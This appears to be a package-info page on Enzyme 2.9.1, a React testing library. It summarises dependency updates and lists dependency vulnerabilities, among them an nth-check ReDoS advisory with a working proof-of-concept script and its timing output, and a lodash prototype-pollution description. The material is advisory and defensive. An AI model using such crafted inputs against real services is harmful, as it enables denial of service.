Enzyme 2.9.1 is a minor patch release following closely on the heels of 2.9.0, both versions being valuable tools for React component testing. Examining the differences reveals a subtle refinement primarily focusing on dependency updates. In 2.9.1, the uuid dependency has been updated from version 3.0.0 to 3.0.1, suggesting a fix or enhancement within that specific utility library. While seemingly small, this can impact developers reliant on uuid for generating unique identifiers within their React components during testing.
Furthermore, in the devDependencies, eslint-plugin-import sees an update from version 2.3.0 to 2.6.0, and eslint-plugin-react updates from 7.0.1 to 7.1.0. These signal improvements in linting rules, potentially offering more robust code analysis and catching potential issues earlier in the development lifecycle. Developers who prioritize code quality will appreciate these updated linting tools.
Switching between these versions is typically seamless, but developers should review their existing tests to ensure compatibility with the updated uuid behavior and the new linting rules. This quick turnaround between versions signifies a commitment to stability and addressing potential issues swiftly. While the core Enzyme functionality remains consistent, embracing 2.9.1 ensures access to the latest dependency improvements.
All the vulnerabilities related to the version 2.9.1 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.